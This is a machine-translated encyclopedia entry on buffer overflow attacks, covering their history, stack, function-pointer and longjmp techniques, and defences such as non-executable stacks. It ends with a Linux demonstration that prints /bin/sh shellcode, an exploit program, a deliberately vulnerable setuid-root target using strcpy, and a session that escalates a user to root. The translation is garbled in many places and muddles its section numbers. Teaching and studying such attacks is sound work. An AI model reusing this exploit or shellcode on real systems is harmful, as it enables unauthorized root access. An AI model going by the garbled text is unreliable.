Buffer Overflow Attack (to be viewed)

This entry for buffer overflow attacks is missing Information bar, Business card chart, Add relevant content to make the entry more complete. You can also quickly upgrade it. Edit it now! A buffer overflow attack is an attack that exploits the buffer overflow vulnerability. Buffer overflow is a very common and dangerous vulnerability, which is widely used in various operating systems and applications. Buffer overflow attacks can cause program running failure, system shutdown, restart, and other consequences.

 

1. Edit Buffer Overflow refers to the amount of buffer itself exceeded when the computer fills the number of data digits in the buffer, and the overflow data overwrites the legal data. Ideally, the program checks the Data Length and does not allow the input to exceed the buffer length. However, most programs assume that the Data Length always matches the allocated storage space, which poses a hidden risk for Buffer Overflow. The buffer used by the operating system is also called a "stack". commands are temporarily stored in the "stack" between various operating processes, and the "stack" also causes a buffer overflow. 2. Hazard editing can be used to execute unauthorized commands or even obtain SYSTEM privileges for various illegal operations. Buffer overflow attacks include buffer overflow, buffer overrun, smash the stack, trash the stack, scribble the stack, mangle the stack, memory leak, and overrun screw; they all refer to the same attack method. The first buffer overflow attack, the Morris worm, occurred two decades ago and caused paralysis of more than 6000 network servers around the world. In the current network and distributed system security, more than 50% of the widely used vulnerabilities are buffer overflow. The most famous example is the worm exploiting the fingerd vulnerability in 1988. In buffer overflow, stack overflow is the most dangerous because intruders can use stack overflow to change the address of the returned program when the function returns and redirect it to any address, one of the hazards is that a program crashes, causing a denial of service. The other is to jump to and execute a piece of malicious code, such as getting a shell and then doing whatever you want. 3. Principle Editing: By writing content beyond its length to the buffer zone of the program, the buffer overflow is caused, and the stack of the program is destroyed. In this way, the program executes other commands to attack the program. The cause of buffer overflow is that the program does not carefully check user input parameters. For example, the following program: void function (char * Str) {char buffer [16]; strcpy (buffer, STR);} strcpy () above () copy the content in STR to the buffer directly. In this way, as long as the STR length is greater than 16, it will cause buffer overflow and cause program running errors. Standard Functions with problems such as strcpy include strcat (), sprintf (), vsprintf (), gets (), and scanf. Of course, if you enter anything in the buffer, it will only pop up when it overflows. Segmentation Error(Segmentation fault. The most common method is to run a User Shell by creating a buffer overflow, and then execute other commands through shell. If the program is root and has SUID permissions, the attacker can obtain a shell with root permissions and perform any operation on the system. Buffer overflow attacks become a common security attack because the buffer overflow vulnerability is too common and easy to implement. In addition, buffer overflow is the main means of remote attacks because the buffer overflow vulnerability gives the attacker everything he wants: embedding and executing the attack code. The implanted attack code runs programs with buffer overflow vulnerabilities with certain permissions to gain control of the attacked host. Two of the five remote attacks that the Lincoln lab used to evaluate Intrusion Detection in 1998 were Buffer Overflow. Of the 13 Cert recommendations in 1998, 9 were related to buffer overflow. In 1999, at least half of the suggestions were related to buffer overflow. In the ugtraq survey, 2/3 of respondents thought the buffer overflow vulnerability was a serious security problem. Buffer overflow vulnerabilities and attacks can be described and classified in section 2. The corresponding defense methods vary according to the attack methods of the attacker. The content of this method is described in section 4, which includes effective defense methods for each attack type. 4. Edit the buffer overflow attack to disturb the functions of programs with certain privileges, so that attackers can gain control of the program. If the program has sufficient permissions, then the entire host is under control. Generally, attackers attack the root program and then execute code similar to "Exec (SH)" to obtain the root permission of the shell. To achieve this goal, attackers must achieve the following two goals: the hacker arranges the appropriate code in the address space of the program. The hacker uses the appropriate initialization registers and memory to redirect the program to the address space executed by the intruder. These two targets are used to classify buffer overflow attacks. Section 2 describes how the attack code is put into the address space of the attacked program. Section 2 describes how attackers can cause a buffer overflow of a program and transfer the execution to the attack code (this is the origin of "overflow ). In section II. 3, we will integrate the code arrangement and techniques used to control the program execution process discussed in the previous two sections. II. 1. There are two methods to arrange proper code in the address space of the program: 1. The attacker enters a string into the attacked program, and the program will put the string in the buffer zone. This string contains information that can run command sequences on the attacked hardware platform. Here, attackers use the buffer zone of the attacked program to store the attack code. The buffer zone can be located anywhere: Stack (stack, automatic variable), heap (heap, dynamically allocated memory zone), and static data zone. 2. Use existing code. Sometimes, the code that the attacker wants is already in the attacked program. All the attacker has to do is pass some parameters to the code. For example, the attack code requires "Exec (bin/sh)" and the code in the libc library executes "Exec (ARG)". Arg is a pointer parameter pointing to a string, therefore, attackers only need to direct the passed parameter pointer to "/bin/sh ". 2.2.control the transfer of programs to attack code all these methods are seeking to change the execution process of programs so that they can jump to the attack code. The most basic thing is to overflow a buffer with no boundary check or other vulnerabilities, which disrupts the normal execution sequence of the program. Through a buffer overflow, attackers can use brute-force methods to rewrite adjacent program spaces and directly skip system checks. The benchmark of classification is the type of the buffer overflow program space that attackers seek. In principle, it can be any space. In fact, many Buffer Overflow uses brute force methods to change program pointers. The difference between such programs is that breakthroughs in the program space are different from those in the memory space. There are three main types: 1. Activation records: When a function call occurs, the caller will keep an activity record in the stack, which contains the address returned when the function ends. The attacker overflows the automatic variables in the stack to point the returned address to the attack code. By changing the return address of the program, the program jumps to the address set by the attacker when the function call ends, instead of the original address. This type of buffer overflow is called Stack smashing attack, which is currently the most common method of buffer overflow attacks. 2. function pointers can be used to locate any address space. For example, "void (* Foo) ()" declares a function pointer variable Foo whose return value is void. Therefore, attackers only need to find an overflow buffer near the function pointer in any space, and then overflow the buffer to change the function pointer. At a certain time point, when a program calls a function through a function pointer, the process of the program is implemented according to the attacker's intention. One of its attack examples is the superprobe program in Linux. 3. Long Jump buffer (longjmp buffers) contains a simple test/recovery system in the C language, called setjmp/longjmp. It means to set "setjmp (buffer)" at the checkpoint and use "longjmp (buffer)" to restore the checkpoint. However, If attackers can access the buffer space, "longjmp (buffer)" is actually directed to the attacker's code. Like a function pointer, The longjmp buffer can point anywhere, so what an attacker needs to do is to find a buffer that can overflow. A typical example is the buffer overflow vulnerability in Perl 5.003. An attacker first enters the longjmp buffer used to recover the buffer overflow, and then induces the attacker to enter the recovery mode, in this way, the perl interpreter is redirected to the attack code. Ii. 3 The simplest and most common buffer overflow attack types of comprehensive analysis of code implantation and process control technologies are the integration of code implantation and activity recording technologies in a single string. The attacker located an automatic variable for overflow and then passed a large string to the program. The code was embedded while the buffer overflow and activity record were changed. This is the attack template pointed out by levy. Because C is used to only provide a small buffer for users and parameters, it is very common for instances with such vulnerability attacks. Code implantation and buffer overflow do not have to be completed in one action. Attackers can place code in a buffer zone, which cannot overflow the buffer zone. Then, attackers can transfer the pointer of the program by overflow to another buffer zone. This method is generally used to solve the problem where the buffer for overflow is not large enough (you cannot put all the code down. If attackers try to use resident code instead of embedding code from outside, they usually have to call the code as a parameter. For example, in some code segments in libc (almost all C programs require it to connect), execute "Exec (something)", where somthing is the parameter. The attacker then uses buffer overflow to change program parameters, and then uses another buffer overflow to direct the program pointer to a specific code segment in libc. 5. Tutorial editor on April 9, January 2000, the Cerberus Security Team released a buffer overflow vulnerability in Microsoft's ⅱ s 4/5. This vulnerability can cause the web server to crash and even obtain super permissions to execute arbitrary code. Microsoft's ⅱ s 4/5 is a mainstream web server program. Therefore, this buffer overflow vulnerability poses a great threat to website security. Its description is as follows: the browser sends an HTTP request to ⅱ. After the domain name (or IP address) is added with a file name, the file name is ". "HTR" as the suffix. Therefore, ⅱ considers that the client is requesting a ". HTR "file,". the HTR extension file is mapped to an ISAPI (Internet Service API) application, and ⅱ will reset to all HTR "resource requests to ism. DLL program, ism. DLL to open the file and execute it. The file name in the request submitted by the browser is stored in the local variable buffer. If it is long and exceeds 600 characters, the local variable buffer overflow will overwrite the returned address space, causes the ⅱ crash. Furthermore, a piece of well-designed code is embedded in the 2 K buffer area shown in 1 to run it with system privileges. 6. edit a defense Method Buffer Overflow Attack accounts for the vast majority of remote network attacks. Such attacks allow an anonymous Internet user to gain partial or full control of a host. If the buffer overflow vulnerability can be effectively eliminated, a large part of the security threats can be mitigated. Currently, there are four basic methods to protect the buffer zone from attacks and impacts caused by buffer overflow. In section, we introduced how to make the buffer zone unexecutable through the operating system, so as to prevent attackers from inserting attack code. In section 4. 2, we introduced how to forcibly write the correct code. In section 4. 3, we introduce how to use the boundary check of the compiler to implement buffer protection. This method makes Buffer Overflow impossible, completely eliminating the threat of buffer overflow, but the cost is relatively high. In section 4, an indirect method is introduced. This method performs integrity check before the program pointer fails. Although this method cannot invalidate all buffer overflow attacks, it can prevent the vast majority of buffer overflow attacks. In section 4. 5, the compatibility and performance advantages of this protection method are analyzed. 4. 1. the unexecuted buffer zone makes the data segment and address space of the attacked program unexecutable, making it impossible for the attacker to execute the code implanted into the attacked program and input the buffer zone, this technology is called a non-execution Buffer technology. In the early UNIX system design, only program code can be executed in the code segment. However, for UNIX and MS Windows systems to achieve better performance and functionality, they often dynamically place executable code in the data segment, which is also the root cause of buffer overflow. To maintain program compatibility, it is impossible to make the data segments of all programs unexecutable. However, you can set the stack data segment to be unexecutable to ensure program compatibility. Linux and Solaris have released Kernel patches in this regard. Because almost no legal program will store code in the stack, this practice almost does not produce any compatibility issues, except for the two special cases in Linux, in this case, executable code must be put into the stack: (1) signal transmission Linux sends a Unix signal to the process by releasing code to the process stack and causing an interruption to execute the code in the stack. Patches for non-execution buffers allow the buffer zone to be executed when sending signals. (2) GCC's online Reuse Research found that GCC placed executable code in the stack area for online reuse. However, disabling this function does not cause any problems, but some functions do not seem to be usable. The protection of non-execution stacks can effectively deal with buffer overflow attacks that Implant code into automatic variables, but it is ineffective for other forms of attacks. You can skip this protection by referencing the pointer of a resident program. Other attacks can bypass protection by embedding code into heap or static data segments. 4. 2. Writing correct codes is a very meaningful task. It is especially like writing a C language that is free and error-prone, this style is caused by the pursuit of performance and ignoring the correctness of the tradition. Although it took a long time to let people know how to write security programs, security vulnerabilities still emerge. Therefore, some tools and technologies have been developed to help experienced programmers write secure and correct programs. The simplest method is to use grep to search for vulnerable library calls in the source code. For example, the call to strcpy and sprintf does not check the length of input parameters. In fact, the standard library of each version C has such a problem. In addition, people have developed some advanced error checking tools, such as fault injection. These tools are designed to search for code security vulnerabilities by manually generating random Buffer Overflow. There are also some static analysis tools used to detect the existence of buffer overflow. Although these tools help programmers develop safer programs, due to the characteristics of the C language, these tools cannot find all buffer overflow vulnerabilities. Therefore, the error detection technology can only be used to reduce the possibility of buffer overflow, and cannot completely eliminate its existence. 7. related countermeasure edit each stack frame corresponds to a function call. When a function call occurs, the new stack frame is pushed into the stack. When the function returns, the corresponding stack frame pops up from the stack. Although the introduction of the stack frame structure provides direct hardware support for implementing functions or processes in advanced languages, however, because the important data such as the return address of the function is stored in the stack visible to the programmer, it brings a great risk to the system. The most famous buffer overflow attack in history may be the attack code carried by Morris worm in November 2, 1988. The Internet worm exploits the buffer overflow vulnerability of the fingerd program, causing great harm to users. More and more buffer overflow vulnerabilities have been discovered since then. From common service programs such as bind, wu-ftpd, telnetd, and Apache to applications provided by software vendors such as Microsoft and Oracle, there seems to be a buffer overflow vulnerability that will never be completed. According to the vulnerability report provided by aligreennet, 2002 detected 1830 vulnerabilities in various operating systems and applications, of which 432 were buffer overflow vulnerabilities, accounting for 23.6% of the total. among the ten most serious and influential security vulnerabilities identified by aligreennet in 2002, there were 6 related to buffer overflow. Before reading this article, you must note that the compiling and Running Environments of all the sample programs in this article are GCC 2.7.2.3 and bash 1.14.7, if you do not know the compiling and running environment you are using, run the following command: $ gcc-vreading specs from/usr/lib/GCC-lib/i386-redhat-linux/2.7.2.3/specsgcc version 2.7.2.3 $ rpm-qf/bin/shbash-1.14.7-168 attack instance edit first look at a buffer in Linux overflow attack instance. # Include <stdlib. h> # include <unistd. h> extern char ** environ; int main (INT argc, char ** argv) {char large_string [128]; long * long_ptr = (long *) large_string; int I; char shellcode [] = "\ xeb \ x1f \ x5e \ x89 \ x76 \ x08 \ x31 \ xc0 \ x88 \ X46 \ x07" "\ x89 \ X46 \ x0c \ xb0 \ x0b \ x89 \ xf3 \ x8d \ x4e \ x08 \ x8d" "\ x56 \ \ x0c \ XCD \ X80 \ x31 \ XDB \ x89 \ xd8 \ X40 \ XCD "" \ X80 \ xe8 \ xdc \ xFF \ xFF/bin/sh "; for (I = 0; I <32; I ++) * (long_ptr + I) = (INT) strtoul (argv [2], null, 16 ); for (I = 0; I <(INT) strlen (shellcode); I ++) large_string [I] = shellcode [I]; setenv ("kirika", large_string, 1); execle (argv [1], argv [1], null, Environ); Return 0 ;} Attacker exe. c# Include <stdio. h> # include <stdlib. h> int main (INT argc, char ** argv) {char buffer [96]; printf ("-% P-\ n", & buffer); strcpy (buffer, getenv ("kirika"); Return 0;} attack object Toto. c. Compile the above two programs into executable programs respectively, and change toto the setuid program with the root owner: $ GCC exe. c-o EXE $ GCC Toto. c-o toto $ supassword: # chown root. root toto # chmod + S toto # ls-l EXE toto-rwxr-XR-x 1 wy OS 11871 Sep 28 20:20 EXE *-rwsr-Sr-x 1 Root 11269 Sep 28 20: 20 toto * # Exitok to see what will happen next. First, do not forget to use the whoami command to verify our identity. In fact, Linux inherits a habit of un ix, that is, the command prompt of a common user starts with $, and the command prompt of a Super User starts. $ Whoamiwy $. /EXE. /toto 0xbfffffff-0xbffffc38-segmentation fault $. /EXE. /toto 0xbffc38-0xbffc38-bash # whoamirootbash # It is generally not successful for the first time, but we can know exactly where the system vulnerability is-0xbffc38. The second attack must be fatal. When we execute the whoami command again under the newly created shell, our identity is already root! In all UN systems, the highest target of hacker attacks is the root permission. Therefore, the system has been cracked. Here we simulate a typical case of a buffer overflow attack in Linux. The owner of Toto is root and has the setuid attribute. Generally, this type of program is a typical attack target of buffer overflow. Wy, a common user, uses the program EXE containing malicious attack code to launch a buffer overflow attack to the defective Toto, and thus obtains the root permission of the system. One thing to note is that if the reader is using a higher version of bash, even if the buffer overflow attack EXE gets a new shell, after you see the result of the whoami command, you may find that your permissions have not changed. The reason is detailed in the last section of this article. However, you can use exe_pro.c in the code package of this article as an attack program, instead of exe. C in Figure 1.

Buffer Overflow Attack (to be viewed)